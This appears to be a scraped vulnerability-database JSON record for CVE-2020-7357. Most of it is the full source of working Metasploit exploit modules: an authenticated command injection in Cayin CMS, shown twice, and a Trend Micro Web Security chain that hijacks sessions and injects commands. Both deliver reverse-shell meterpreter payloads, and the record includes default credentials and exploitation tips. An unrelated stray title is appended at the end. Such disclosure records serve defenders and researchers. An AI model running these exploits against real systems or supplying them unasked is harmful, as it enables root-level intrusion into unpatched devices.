"cpe:/o:cayintech:cms-60_firmware:11.0", "cpe:/o:cayintech:cms:7.5", "cpe:/o:cayintech:cms-40_firmware:9.0", "cpe:/o:cayintech:cms:8.0"], "id": "CVE-2020-7357", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7357", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cayintech:cms-se_firmware:11.0:19025:*:*:*:*:*:*", "cpe:2.3:o:cayintech:cms:8.2:12199:*:*:*:*:*:*", "cpe:2.3:o:cayintech:cms-40_firmware:9.0:14197:*:*:*:*:*:*", "cpe:2.3:o:cayintech:cms:8.0:11175:*:*:*:*:*:*", "cpe:2.3:o:cayintech:cms-se_firmware:11.0:18325:*:*:*:*:*:*", "cpe:2.3:o:cayintech:cms-40_firmware:9.0:14199:*:*:*:*:*:*", "cpe:2.3:o:cayintech:cms-60_firmware:11.0:19025:*:*:*:*:*:*", "cpe:2.3:o:cayintech:cms-se_firmware:11.0:19179:*:*:*:*:*:*", "cpe:2.3:o:cayintech:cms-40_firmware:9.0:14093:*:*:*:*:*:*", "cpe:2.3:o:cayintech:cms:7.5:11175:*:*:*:*:*:*", "cpe:2.3:o:cayintech:cms-20_firmware:9.0:14092:*:*:*:*:*:*", "cpe:2.3:o:cayintech:cms-20_firmware:9.0:14197:*:*:*:*:*:*", "cpe:2.3:o:cayintech:cms-se-lxc_firmware:-:*:*:*:*:*:*:*"]}], "0daydb": [{"lastseen": "2020-06-23T13:12:54", "description": "This Metasploit module exploits an authenticated remote code execution vulnerability in Cayin CMS versions 11.0", "edition": 2, "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-06-21T09:10:16", "title": "Cayin CMS NTP Server 11.0 CVE-2020-7357 - Remote Code Execution", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7357"], "modified": "2020-06-21T09:10:18", "id": "0DAYDB:C57A9B90D79DABF84D4F9466329F6A30", "href": "https://0daydb.com/cayin-cms-ntp-server-11-0-cve-2020-7357-remote-code-execution.html", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Cayin CMS NTP Server RCE',\n 'Description' => %q{\n This module exploits an authenticated RCE in Cayin CMS <= 11.0. The RCE is executed\n in the system_service.cgi file's ntpIp Parameter. The field is limited in size, so\n repeated requests are made to achieve a larger payload.\n Cayin CMS-SE is built for Ubuntu 16.04 (20.04 failed to install correctly), so the\n environment should be pretty set and not dynamic between targets.\n Results in root level access.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'h00die', # msf module\n 'Gjoko Krstic (LiquidWorm) <[email\u00a0protected]>' # original PoC, discovery\n ],\n 'References' =>\n [\n [ 'EDB', '48553' ],\n [ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php' ],\n [ 'CVE', '2020-7357' ]\n ],\n 'Platform' => ['linux'],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'\n },\n 'Privileged' => true,\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Automatic Target', {}]\n ],\n 'DisclosureDate' => 'Jun 4 2020',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]\n }\n )\n )\n register_options(\n [\n Opt::RPORT(80),\n OptString.new('TARGETURI', [true, 'The URI of Cayin CMS', '/']),\n OptString.new('USERNAME', [true, 'Username to login with', 'administrator']),\n OptString.new('PASSWORD', [true, 'Username to login with', 'admin']),\n # from the original advisory, leaving here just in case\n # OptString.new('USERNAME', [true, 'Username to login with', 'webadmin'])\n # OptString.new('PASSWORD', [true, 'Username to login with', 'bctvadmin'])\n ]\n )\n end\n\n def check\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi')\n )\n\n if res.nil? || res.code != 200\n return CheckCode::Safe('Could not connect to the web service, check URI Path and IP')\n end\n\n if res.body.include?('var model = \"CMS') && res.body.include?('STR_CAYIN_LOGO')\n print_good('Cayin CMS install detected')\n return CheckCode::Detected\n end\n\n CheckCode::Safe\n rescue ::Rex::ConnectionError\n CheckCode::Safe('Could not connect to the web service, check URI Path and IP')\n end\n\n def login\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi'),\n 'method' => 'POST',\n 'vars_post' => {\n 'apply_mode' => 'login',\n 'lang' => 'ENG',\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n }\n )\n\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not connect to web service - no response\") if res.nil?\n\n # instead of a 302 like most apps, this does a script window.location to forward...\n unless res.code == 200 && res.body.include?('/cgi-bin/system_status.cgi')\n fail_with(Failure::BadConfig, \"#{peer} - Login failed. Check username and password\")\n end\n\n res.get_cookies\n end\n\n def execute_command(cmd, _opts = {})\n # originally attempted to use the 'test' functionality, however it attempts 3 times which\n # means our exploit code stage chunks are written 3 times.\n # also attempted to just 'save', however it doesn't execute an update.\n # 'update' was the prefered functionality\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'system_service.cgi'),\n 'method' => 'POST',\n 'cookie' => \"#{@cookie} sys=Service\",\n 'vars_post' => {\n 'exe' => 'webSvrUpdateNtp',\n 'ntpIp' => \"`#{cmd}`\"\n\n # test button, executes 3 times\n # 'exe' => 'webSvrTestNtp', # just do the 'test', doesnt change config and still runs\n # 'ntpIp' => \"`#{cmd}`\"\n\n # save button, but doesnt execute\n # 'save' => 'webSvrNtp',\n # 'ntpIp' => \"`#{cmd}`\",\n # 'ntpEnable' => 1,\n # 'ntp_server' => 0\n }\n )\n end\n\n def exploit\n if check != CheckCode::Detected\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable')\n end\n\n @cookie = login\n execute_cmdstager(flavor: :printf, linemax: 200)\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\")\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-06-24T13:13:07", "description": "This Metasploit module exploits multiple vulnerabilities together in order to achieve a remote code execution.", "edition": 2, "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-06-24T08:21:12", "title": "Trend Micro Web Security - Remote Code Execution", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8605", "CVE-2020-7357", "CVE-2020-8604", "CVE-2020-8606"], "modified": "2020-06-24T08:21:14", "id": "0DAYDB:CEDEF1CFCB77584DD9FCF93507303E1D", "href": "https://0daydb.com/trend-micro-web-security-remote-code-execution.html", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',\n 'Description' => %q{\n This module exploits multiple vulnerabilities together in order to achive a remote code execution.\n Unauthenticated users can execute a terminal command under the context of the root user.\n\n The specific flaw exists within the LogSettingHandler class of administrator interface software.\n When parsing the mount_device parameter, the process does not properly validate a user-supplied string\n before using it to execute a system call. An attacker can leverage this vulnerability to execute code in\n the context of root. But authentication is required to exploit this vulnerability.\n\n Another specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users\n can exploit this vulnerability in order to communicate with internal services in the product.\n\n Last but not least a flaw exists within the Apache Solr application, which is installed within the product.\n When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations.\n An attacker can leverage this vulnerability to disclose information in the context of the IWSS user.\n\n Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.\n\n Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Mehmet Ince <[email\u00a0protected]>' # discovery & msf module\n ],\n 'References' =>\n [\n ['CVE', '2020-8604'],\n ['CVE', '2020-8605'],\n ['CVE', '2020-8606'],\n ['ZDI', '20-676'],\n ['ZDI', '20-677'],\n ['ZDI', '20-678']\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'SSL' => true,\n 'payload' => 'python/meterpreter/reverse_tcp',\n 'WfsDelay' => 30\n },\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'ConnectionType' => '-bind'\n }\n },\n 'Platform' => ['python'],\n 'Arch' => ARCH_PYTHON,\n 'Targets' => [ ['Automatic', {}] ],\n 'DisclosureDate' => '2020-06-10',\n 'DefaultTarget' => 0,\n 'Notes' =>\n {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(8443),\n OptInt.new('PROXY_PORT', [true, 'Port number of Trend Micro Web Filter Proxy service', 8080])\n ]\n )\n end\n\n def hijack_cookie\n # Updating SSL and RPORT in order to communicate with HTTP proxy service.\n if datastore['SSL']\n ssl_restore = true\n datastore['SSL'] = false\n end\n port_restore = datastore['RPORT']\n datastore['RPORT'] = datastore['PROXY_PORT']\n\n @jsessionid = ''\n\n # We are exploiting proxy service vulnerability in order to fetch content of catalina.out file\n print_status('Trying to extract session ID by exploiting reverse proxy service')\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => \"http://#{datastore['RHOST']}:8983/solr/collection0/replication\",\n 'vars_get' => {\n 'command' => 'filecontent',\n 'wt' => 'filestream',\n 'generation' => 1,\n 'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out'\n }\n })\n\n # Restore variables and validate extracted sessionid\n datastore['SSL'] = true if ssl_restore\n datastore['RPORT'] = port_restore\n\n # Routine check on res object\n unless res\n fail_with(Failure::Unreachable, 'Target is unreachable.')\n end\n\n # If the res code is not 200 that means proxy service is not vulnerable.\n unless res.code == 200\n @jsessionid = -1\n return\n end\n\n # Now we are going to extract all JESSIONID from log file and store them in array.\n cookies = res.body.scan(/CheckUserLogon sessionid : (.*)/).flatten\n\n if cookies.empty?\n @jsessionid = 0\n print_error('System is vulnerable, however a user session was not detected and is therefore unexploitable. Retry after a user logs in.')\n return\n end\n\n print_good(\"Extracted number of JSESSIONID: #{cookies.length}\")\n\n # We gotta switch back to adminsitrator interface port instead of proxy service. Restore rport and ssl variables.\n datastore['SSL'] = true if ssl_restore\n datastore['RPORT'] = port_restore\n\n # Latest cookie in the log file is the one most probably active. So that we use reverse on array.\n cookies.reverse.each_with_index do |cookie, index|\n print_status(\"Testing JSESSIONID ##{index} : #{cookie}\")\n\n # This endpoints is basically check session :)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),\n 'cookie' => \"JSESSIONID=#{cookie}\"\n })\n\n # Routine res check\n unless res\n fail_with(Failure::UnexpectedReply, 'Target is unreachable.')\n end\n\n # If the cookie is active !\n if res.code == 200 && res.body.include?('session_flag')\n print_good(\"Awesome!!! JESSIONID ##{index} is active.\")\n @jsessionid = cookie\n break\n end\n\n print_warning(\"JSESSIONID ##{index} is inactive! Moving to the next one.\")\n end\n\n if @jsessionid.empty?\n print_error('System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.')\n end\n end\n\n def check\n #\n # @jsessionid can be one of the following value\n #\n # -1 = Proxy service is not vulnerable, which means we'r not gonna\n # be able to read catalina.out\n #\n # 0 = Proxy service is vulnerable, but catalina.out does not contain any\n # jessionid string yet !\n #\n # empty = Proxy service is vulnerable, but jessionid within log file but\n # none of them are valid:(\n #\n # string = Proxy service is vulnerable and sessionid is valid !\n #\n hijack_cookie\n\n if @jsessionid == -1\n CheckCode::Safe\n else\n CheckCode::Vulnerable\n end\n end\n\n def exploit\n\n unless check == CheckCode::Vulnerable\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n #\n # 0 => Proxy service is vulnerable, but catalina.out does not contain any\n # jessionid string yet !\n #\n # empty => Proxy service is vulnerable, but jessionid within log file but\n # none of them are valid:(\n #\n if @jsessionid.empty? || @jessionid == 0\n fail_with Failure::NoAccess, ''\n end\n\n print_status('Exploiting command injection vulnerability')\n\n # Yet another app specific bypass is going on here.\n # It's so buggy to make the cmd payloads work under the following circumstances (Weak blacklisting, double escaping etc)\n # For that reason, I am planting our payload dropper within the perl command.\n\n cmd = \"python -c \\\"#{payload.encoded}\\\"\"\n final_payload = cmd.to_s.unpack1('H*')\n p = \"perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'\"\n\n vars_post = {\n mount_device: \"mount $(#{p}) /var/offload\",\n cmd: 'mount'\n }\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),\n 'cookie' => \"JSESSIONID=#{@jsessionid}\",\n 'ctype' => 'application/json',\n 'data' => vars_post.to_json\n })\n end\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-07-20T20:15:18", "description": "Cayin CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user through the \u2018NTP_Server_IP\u2019 HTTP POST parameter in system.cgi page. This issue affects several branches and versions of the CMS application, including CME-SE, CMS-60, CMS-40, CMS-20, and CMS version 8.2, 8.0, and 7.5.\n\n \n**Recent assessments:** \n \n**h00die** at June 17, 2020 4:05pm UTC reported:\n\nCayin CMS systems have an AUTHENTICATED RCE in the NTP configuration. The system didn\u2019t install correctly on Ubuntu 20.04 at the time the exploit was released, and the company recommends Ubuntu 16.04, unknown if 18.04 will work. Grants root on Ubuntu.\n\nRequires creds, default for CMS-SE was administrator:admin, but the original write-up mentions webadmin:bctvadmin.\n\nCMS system can come on hardware devices. CMS-SE the exploitable file is `system_service.cgi` however the original vuln write-up mentions `system.cgi`, so it looks like there is a variance between the hardware devices and the Ubuntu installer. YMMV.\n\nAfter authentication, the exploit is against the NTP server IP field. During testing of CMS-SE the `Update` button/functionality was used. Clicking save did not have an immediate effect, and `Test` worked, but executed 3 times. If your payload is small, you could use `Test`, however with a larger payload like meterp, it was determined that the payload was writing 3 times in each stage\u2026 So if the payload chunks were A, B, C, the payload ended up AAABBBCCC. \nDue to character limit, any payload that isn\u2019t small will need to go through a `cmdstager` type chunking. The field can take ~200 characters, believed to be about ~230 but 200 was used in the exploit to allow for padding.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-04-06T00:00:00", "type": "attackerkb", "title": "CVE-2020-7357", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7357"], "modified": "2020-08-06T00:00:00", "id": "AKB:D3C248C5-405C-43B4-B8A7-8E6E6966F7C4", "href": "https://attackerkb.com/topics/dGgCVSzwyJ/cve-2020-7357", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-06-19T01:01:39", "description": "", "cvss3": {}, "published": "2020-06-18T00:00:00", "type": "packetstorm", "title": "Cayin CMS NTP Server 11.0 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-7357"], "modified": "2020-06-18T00:00:00", "id": "PACKETSTORM:158139", "href": "https://packetstormsecurity.com/files/158139/Cayin-CMS-NTP-Server-11.0-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Cayin CMS NTP Server RCE', \n'Description' => %q{ \nThis module exploits an authenticated RCE in Cayin CMS <= 11.0. The RCE is executed \nin the system_service.cgi file's ntpIp Parameter. The field is limited in size, so \nrepeated requests are made to achieve a larger payload. \nCayin CMS-SE is built for Ubuntu 16.04 (20.04 failed to install correctly), so the \nenvironment should be pretty set and not dynamic between targets. \nResults in root level access. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'h00die', # msf module \n'Gjoko Krstic (LiquidWorm) <gjoko@zeroscience.mk>' # original PoC, discovery \n], \n'References' => \n[ \n[ 'EDB', '48553' ], \n[ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php' ], \n[ 'CVE', '2020-7357' ] \n], \n'Platform' => ['linux'], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' \n}, \n'Privileged' => true, \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => \n[ \n[ 'Automatic Target', {}] \n], \n'DisclosureDate' => 'Jun 4 2020', \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES] \n} \n) \n) \nregister_options( \n[ \nOpt::RPORT(80), \nOptString.new('TARGETURI', [true, 'The URI of Cayin CMS', '/']), \nOptString.new('USERNAME', [true, 'Username to login with', 'administrator']), \nOptString.new('PASSWORD', [true, 'Username to login with', 'admin']), \n# from the original advisory, leaving here just in case \n# OptString.new('USERNAME', [true, 'Username to login with', 'webadmin']) \n# OptString.new('PASSWORD', [true, 'Username to login with', 'bctvadmin']) \n] \n) \nend \n \ndef check \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi') \n) \n \nif res.nil? || res.code != 200 \nreturn CheckCode::Safe('Could not connect to the web service, check URI Path and IP') \nend \n \nif res.body.include?('var model = \"CMS') && res.body.include?('STR_CAYIN_LOGO') \nprint_good('Cayin CMS install detected') \nreturn CheckCode::Detected \nend \n \nCheckCode::Safe \nrescue ::Rex::ConnectionError \nCheckCode::Safe('Could not connect to the web service, check URI Path and IP') \nend \n \ndef login \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi'), \n'method' => 'POST', \n'vars_post' => { \n'apply_mode' => 'login', \n'lang' => 'ENG', \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'] \n} \n) \n \nfail_with(Failure::UnexpectedReply, \"#{peer} - Could not connect to web service - no response\") if res.nil? \n \n# instead of a 302 like most apps, this does a script window.location to forward... \nunless res.code == 200 && res.body.include?('/cgi-bin/system_status.cgi') \nfail_with(Failure::BadConfig, \"#{peer} - Login failed. Check username and password\") \nend \n \nres.get_cookies \nend \n \ndef execute_command(cmd, _opts = {}) \n# originally attempted to use the 'test' functionality, however it attempts 3 times which \n# means our exploit code stage chunks are written 3 times. \n# also attempted to just 'save', however it doesn't execute an update. \n# 'update' was the prefered functionality \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'system_service.cgi'), \n'method' => 'POST', \n'cookie' => \"#{@cookie} sys=Service\", \n'vars_post' => { \n'exe' => 'webSvrUpdateNtp', \n'ntpIp' => \"`#{cmd}`\" \n \n# test button, executes 3 times \n# 'exe' => 'webSvrTestNtp', # just do the 'test', doesnt change config and still runs \n# 'ntpIp' => \"`#{cmd}`\" \n \n# save button, but doesnt execute \n# 'save' => 'webSvrNtp', \n# 'ntpIp' => \"`#{cmd}`\", \n# 'ntpEnable' => 1, \n# 'ntp_server' => 0 \n} \n) \nend \n \ndef exploit \nif check != CheckCode::Detected \nfail_with(Failure::NotVulnerable, 'Target is not vulnerable') \nend \n \n@cookie = login \nexecute_cmdstager(flavor: :printf, linemax: 200) \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\") \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158139/cayin_cms_ntp.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}

Code Blocks 17.12 - Local Buffer Overflow

Description

Related